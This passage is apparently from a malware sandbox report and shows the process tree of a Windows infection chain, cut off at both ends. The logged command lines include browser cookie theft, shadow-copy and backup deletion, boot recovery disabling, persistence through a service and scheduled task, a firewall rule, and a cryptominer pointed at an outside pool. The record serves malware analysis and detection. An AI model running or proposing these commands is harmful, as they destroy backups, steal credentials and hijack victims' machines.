                                                                      "C:\Users\Admin\Documents\48XJFPXCRU2EeQ4IFHRW7e5u.exe"
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      PID:4864
                                                                    • C:\Users\Admin\Documents\H3784vkDCiSM7OCGPHE1iJwg.exe
                                                                      "C:\Users\Admin\Documents\H3784vkDCiSM7OCGPHE1iJwg.exe"
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      • Checks BIOS information in registry
                                                                      • Checks whether UAC is enabled
                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4828
                                                                    • C:\Users\Admin\Documents\ugY3AlfNh6WhXjXW9CQxNJRB.exe
                                                                      "C:\Users\Admin\Documents\ugY3AlfNh6WhXjXW9CQxNJRB.exe"
                                                                      6⤵
                                                                        PID:4160
                                                                        • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                          "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          PID:1716
                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            8⤵
                                                                            • Executes dropped EXE
                                                                            PID:2696
                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            8⤵
                                                                            • Executes dropped EXE
                                                                            PID:3908
                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            8⤵
                                                                              PID:2788
                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              8⤵
                                                                                PID:5264
                                                                            • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                              "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              • Checks whether UAC is enabled
                                                                              PID:2480
                                                                            • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                              "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:4024
                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                8⤵
                                                                                • Executes dropped EXE
                                                                                PID:4968
                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                8⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:4204
                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                8⤵
                                                                                • Executes dropped EXE
                                                                                PID:5440
                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                8⤵
                                                                                • Executes dropped EXE
                                                                                PID:5696
                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                8⤵
                                                                                  PID:3136
                                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                  8⤵
                                                                                    PID:5140
                                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                    8⤵
                                                                                      PID:216
                                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                      8⤵
                                                                                        PID:764
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c sonia_4.exe
                                                                                4⤵
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:2028
                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS4EB9B7B5\sonia_4.exe
                                                                                  sonia_4.exe
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:3964
                                                                                  • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4200
                                                                                    • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:4772
                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        8⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4784
                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        8⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:3980
                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        8⤵
                                                                                          PID:4264
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          8⤵
                                                                                            PID:5964
                                                                                        • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe"
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:3880
                                                                                          • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                                                            8⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:4972
                                                                                        • C:\Users\Admin\AppData\Local\Temp\setup 326.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\setup 326.exe"
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          • Drops file in Windows directory
                                                                                          PID:1820
                                                                                          • C:\Windows\winnetdriv.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\setup 326.exe" 1627311308 0
                                                                                            8⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4728
                                                                                        • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4660
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 804
                                                                                            8⤵
                                                                                            • Program crash
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:4624
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 836
                                                                                            8⤵
                                                                                            • Program crash
                                                                                            PID:4204
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 892
                                                                                            8⤵
                                                                                            • Program crash
                                                                                            PID:2088
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 944
                                                                                            8⤵
                                                                                            • Program crash
                                                                                            PID:5068
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 920
                                                                                            8⤵
                                                                                            • Program crash
                                                                                            PID:4572
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 988
                                                                                            8⤵
                                                                                            • Program crash
                                                                                            PID:1236
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 852
                                                                                            8⤵
                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                            • Program crash
                                                                                            PID:4500
                                                                                        • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\zhangd.exe"
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4160
                                                                                          • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\zhangd.exe" -a
                                                                                            8⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4820
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe"
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4756
                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                            C:\Windows\system32\WerFault.exe -u -p 4756 -s 1000
                                                                                            8⤵
                                                                                            • Executes dropped EXE
                                                                                            • Program crash
                                                                                            PID:4168
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c sonia_2.exe
                                                                                    4⤵
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:1160
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 420
                                                                                    4⤵
                                                                                    • Program crash
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:3584
                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS4EB9B7B5\sonia_2.exe
                                                                              sonia_2.exe
                                                                              1⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Checks SCSI registry key(s)
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              PID:3484
                                                                            • C:\Windows\system32\rUNdlL32.eXe
                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                              1⤵
                                                                              • Process spawned unexpected child process
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:3520
                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                2⤵
                                                                                • Loads dropped DLL
                                                                                • Modifies registry class
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:412
                                                                            • C:\Windows\system32\rUNdlL32.eXe
                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                              1⤵
                                                                              • Process spawned unexpected child process
                                                                              PID:2012
                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                2⤵
                                                                                  PID:3284
                                                                              • C:\Users\Admin\AppData\Local\Temp\EDB7.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\EDB7.exe
                                                                                1⤵
                                                                                  PID:5256
                                                                                  • C:\Users\Admin\AppData\Local\Temp\EDB7.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\EDB7.exe
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Adds Run key to start application
                                                                                    PID:5728
                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                      icacls "C:\Users\Admin\AppData\Local\b18b3c2d-0a55-4c8a-b542-3ac7927c5b8d" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                      3⤵
                                                                                      • Modifies file permissions
                                                                                      PID:5916
                                                                                    • C:\Users\Admin\AppData\Local\Temp\EDB7.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\EDB7.exe" --Admin IsNotAutoStart IsNotTask
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:5960
                                                                                      • C:\Users\Admin\AppData\Local\Temp\EDB7.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\EDB7.exe" --Admin IsNotAutoStart IsNotTask
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:572
                                                                                        • C:\Users\Admin\AppData\Local\f4852c5b-1d3b-4a72-b4d4-b8707209f6f3\build2.exe
                                                                                          "C:\Users\Admin\AppData\Local\f4852c5b-1d3b-4a72-b4d4-b8707209f6f3\build2.exe"
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:3844
                                                                                          • C:\Users\Admin\AppData\Local\f4852c5b-1d3b-4a72-b4d4-b8707209f6f3\build2.exe
                                                                                            "C:\Users\Admin\AppData\Local\f4852c5b-1d3b-4a72-b4d4-b8707209f6f3\build2.exe"
                                                                                            6⤵
                                                                                            • Loads dropped DLL
                                                                                            • Checks processor information in registry
                                                                                            PID:5340
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\f4852c5b-1d3b-4a72-b4d4-b8707209f6f3\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                              7⤵
                                                                                              • Blocklisted process makes network request
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:4864
                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                taskkill /im build2.exe /f
                                                                                                8⤵
                                                                                                • Kills process with taskkill
                                                                                                PID:6016
                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                timeout /t 6
                                                                                                8⤵
                                                                                                • Delays execution with timeout.exe
                                                                                                PID:5260
                                                                                • C:\Users\Admin\AppData\Local\Temp\6AF.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\6AF.exe
                                                                                  1⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:5572
                                                                                • C:\Windows\servicing\TrustedInstaller.exe
                                                                                  C:\Windows\servicing\TrustedInstaller.exe
                                                                                  1⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:4636
                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                  1⤵
                                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                  PID:740
                                                                                • C:\Users\Admin\AppData\Local\Temp\5751.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\5751.exe
                                                                                  1⤵
                                                                                  • Executes dropped EXE
                                                                                  • Checks BIOS information in registry
                                                                                  • Checks whether UAC is enabled
                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                  PID:5724
                                                                                • C:\Users\Admin\AppData\Local\Temp\66C3.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\66C3.exe
                                                                                  1⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:2044
                                                                                • C:\Users\Admin\AppData\Local\Temp\6C42.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\6C42.exe
                                                                                  1⤵
                                                                                  • Executes dropped EXE
                                                                                  • Checks BIOS information in registry
                                                                                  • Maps connected drives based on registry
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:5892
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iPvRzSnass" /XML "C:\Users\Admin\AppData\Local\Temp\tmpF506.tmp"
                                                                                    2⤵
                                                                                    • Creates scheduled task(s)
                                                                                    PID:1688
                                                                                  • C:\Users\Admin\AppData\Local\Temp\6C42.exe
                                                                                    "{path}"
                                                                                    2⤵
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:4108
                                                                                    • C:\Users\Admin\AppData\Local\Temp\6C42.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\6C42.exe
                                                                                      3⤵
                                                                                        PID:5356
                                                                                  • C:\Users\Admin\AppData\Local\Temp\6D8B.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\6D8B.exe
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Checks processor information in registry
                                                                                    PID:2656
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im 6D8B.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\6D8B.exe" & del C:\ProgramData\*.dll & exit
                                                                                      2⤵
                                                                                        PID:4140
                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                          taskkill /im 6D8B.exe /f
                                                                                          3⤵
                                                                                          • Kills process with taskkill
                                                                                          PID:5568
                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                          timeout /t 6
                                                                                          3⤵
                                                                                          • Delays execution with timeout.exe
                                                                                          PID:4812
                                                                                    • C:\Users\Admin\AppData\Local\Temp\6E96.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\6E96.exe
                                                                                      1⤵
                                                                                        PID:5812
                                                                                        • C:\Users\Admin\AppData\Local\Temp\6E96.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\6E96.exe
                                                                                          2⤵
                                                                                            PID:6104
                                                                                        • C:\Users\Admin\AppData\Local\Temp\77BE.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\77BE.exe
                                                                                          1⤵
                                                                                          • Loads dropped DLL
                                                                                          PID:6116
                                                                                        • C:\Users\Admin\AppData\Local\Temp\8433.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\8433.exe
                                                                                          1⤵
                                                                                            PID:5300
                                                                                          • C:\Users\Admin\AppData\Local\Temp\8F11.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\8F11.exe
                                                                                            1⤵
                                                                                              PID:1880
                                                                                            • C:\Users\Admin\AppData\Local\Temp\950D.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\950D.exe
                                                                                              1⤵
                                                                                              • Enumerates connected drives
                                                                                              PID:5592
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
                                                                                                2⤵
                                                                                                  PID:5364
                                                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                    wmic shadowcopy delete
                                                                                                    3⤵
                                                                                                      PID:4912
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
                                                                                                    2⤵
                                                                                                      PID:2712
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                      2⤵
                                                                                                        PID:5612
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                        2⤵
                                                                                                          PID:5680
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                                                                                                          2⤵
                                                                                                            PID:5560
                                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                              vssadmin delete shadows /all /quiet
                                                                                                              3⤵
                                                                                                              • Interacts with shadow copies
                                                                                                              PID:4276
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\950D.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\950D.exe" -agent 0
                                                                                                            2⤵
                                                                                                            • Modifies extensions of user files
                                                                                                            • Drops file in Program Files directory
                                                                                                            • Drops file in Windows directory
                                                                                                            PID:4944
                                                                                                          • C:\Windows\SysWOW64\notepad.exe
                                                                                                            notepad.exe
                                                                                                            2⤵
                                                                                                              PID:5988
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\A78D.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\A78D.exe
                                                                                                            1⤵
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Checks whether UAC is enabled
                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                            PID:5264
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\AB85.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\AB85.exe
                                                                                                            1⤵
                                                                                                              PID:5760
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\aqvfrelu\
                                                                                                                2⤵
                                                                                                                • Blocklisted process makes network request
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:632
                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  3⤵
                                                                                                                  • Loads dropped DLL
                                                                                                                  • Modifies registry class
                                                                                                                  PID:3284
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\vieucjeo.exe" C:\Windows\SysWOW64\aqvfrelu\
                                                                                                                2⤵
                                                                                                                  PID:6020
                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                  "C:\Windows\System32\sc.exe" create aqvfrelu binPath= "C:\Windows\SysWOW64\aqvfrelu\vieucjeo.exe /d\"C:\Users\Admin\AppData\Local\Temp\AB85.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                  2⤵
                                                                                                                    PID:2684
                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                    "C:\Windows\System32\sc.exe" description aqvfrelu "wifi internet conection"
                                                                                                                    2⤵
                                                                                                                      PID:4788
                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                      "C:\Windows\System32\sc.exe" start aqvfrelu
                                                                                                                      2⤵
                                                                                                                        PID:6132
                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                        2⤵
                                                                                                                          PID:5284
                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            3⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            PID:5812
                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                        1⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                        PID:5256
                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                        C:\Windows\explorer.exe
                                                                                                                        1⤵
                                                                                                                          PID:4104
                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                          1⤵
                                                                                                                            PID:3476
                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                            C:\Windows\explorer.exe
                                                                                                                            1⤵
                                                                                                                              PID:5100
                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                              1⤵
                                                                                                                                PID:6048
                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                1⤵
                                                                                                                                  PID:1328
                                                                                                                                • C:\Windows\SysWOW64\aqvfrelu\vieucjeo.exe
                                                                                                                                  C:\Windows\SysWOW64\aqvfrelu\vieucjeo.exe /d"C:\Users\Admin\AppData\Local\Temp\AB85.exe"
                                                                                                                                  1⤵
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  PID:5820
                                                                                                                                  • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                    svchost.exe
                                                                                                                                    2⤵
                                                                                                                                    • Drops file in System32 directory
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                    PID:5460
                                                                                                                                    • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                      svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                                                                                                                                      3⤵
                                                                                                                                        PID:4712
                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    1⤵
                                                                                                                                      PID:5352
                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                      1⤵
                                                                                                                                        PID:1408
                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                        1⤵
                                                                                                                                          PID:5320
                                                                                                                                        • C:\Windows\system32\vssvc.exe
                                                                                                                                          C:\Windows\system32\vssvc.exe
                                                                                                                                          1⤵
                                                                                                                                            PID:1044
                                                                                                                                          • C:\Windows\system32\vssvc.exe
                                                                                                                                            C:\Windows\system32\vssvc.exe
                                                                                                                                            1⤵
                                                                                                                                              PID:3340
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\29A4.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\29A4.exe
                                                                                                                                              1⤵
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                              PID:5152
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\8E0C.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\8E0C.exe
                                                                                                                                              1⤵
                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                              PID:4876
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\8E0C.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\8E0C.exe
                                                                                                                                                2⤵
                                                                                                                                                  PID:3460
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\8E0C.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\8E0C.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                    3⤵
                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                    PID:1164
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\8E0C.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\8E0C.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                      4⤵
                                                                                                                                                        PID:3216
                                                                                                                                                        • C:\Users\Admin\AppData\Local\6f01e654-c5a7-4af4-b6b4-a2703ab2c7df\build2.exe
